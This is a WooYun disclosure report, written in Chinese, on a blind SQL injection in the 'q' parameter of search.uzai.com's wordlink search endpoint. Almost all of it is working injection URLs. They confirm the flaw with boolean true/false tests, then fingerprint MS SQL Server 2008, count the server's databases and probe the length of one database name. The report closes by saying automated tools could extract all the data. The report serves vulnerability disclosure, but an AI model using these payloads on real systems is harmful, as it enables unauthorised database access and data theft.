WooYun.org

0.请求：http://search.uzai.com/search/wordlink?q=g&ran=0.07143457215560722&searchCallBack=jsonpCallback&_=1402214741100
注入参数:q
1.判断是否存在注入
http://search.uzai.com/search/wordlink?q=g%2527&ran=0.07143457215560722&searchCallBack=jsonpCallback&_=1402214741100 报错

http://search.uzai.com/search/wordlink?q=g%25%2527 and 1=1 and %2527%25%2527=%2527&ran=0.07143457215560722&searchCallBack=jsonpCallback&_=1402214741100 正常返回

http://search.uzai.com/search/wordlink?q=g%25%2527 and 1=2 and %2527%25%2527=%2527&ran=0.07143457215560722&searchCallBack=jsonpCallback&_=1402214741100 无返回

2.手动获取一些信息
http://search.uzai.com/search/wordlink?q=g%25%2527 and exists (select count(*) from sysobjects) and %2527%25%2527=%2527&ran=0.07143457215560722&searchCallBack=jsonpCallback&_=1402214741100 正常返回,说明数据库为 MS SQL Server

http://search.uzai.com/search/wordlink?q=g%25%2527 and substring((select @@version),22,4)=2008 and %2527%25%2527=%2527&ran=0.07143457215560722&searchCallBack=jsonpCallback&_=1402214741100 正常返回,其他（=2000，=2003）无返回，说明数据库版本为MS SQL Server 2008

http://search.uzai.com/search/wordlink?q=g%25%2527 and (select count(*) from master.dbo.sysdatabases where dbid=24)=1 and %2527%25%2527=%2527&ran=0.07143457215560722&searchCallBack=jsonpCallback&_=1402214741100 正常返回，=25 无返回，说明有24个数据库

http://search.uzai.com/search/wordlink?q=g%25%2527 and (select count(*) from master.dbo.sysdatabases where dbid=24 and len(name)=8)=1 and %2527%25%2527=%2527&ran=0.07143457215560722&searchCallBack=jsonpCallback&_=1402214741100 返回正常，其他（=7，=9）无返回，说明dbid=24的数据库的长度为8.

使用自动化工具就可以获取全部数据库数据，这里就不深入了...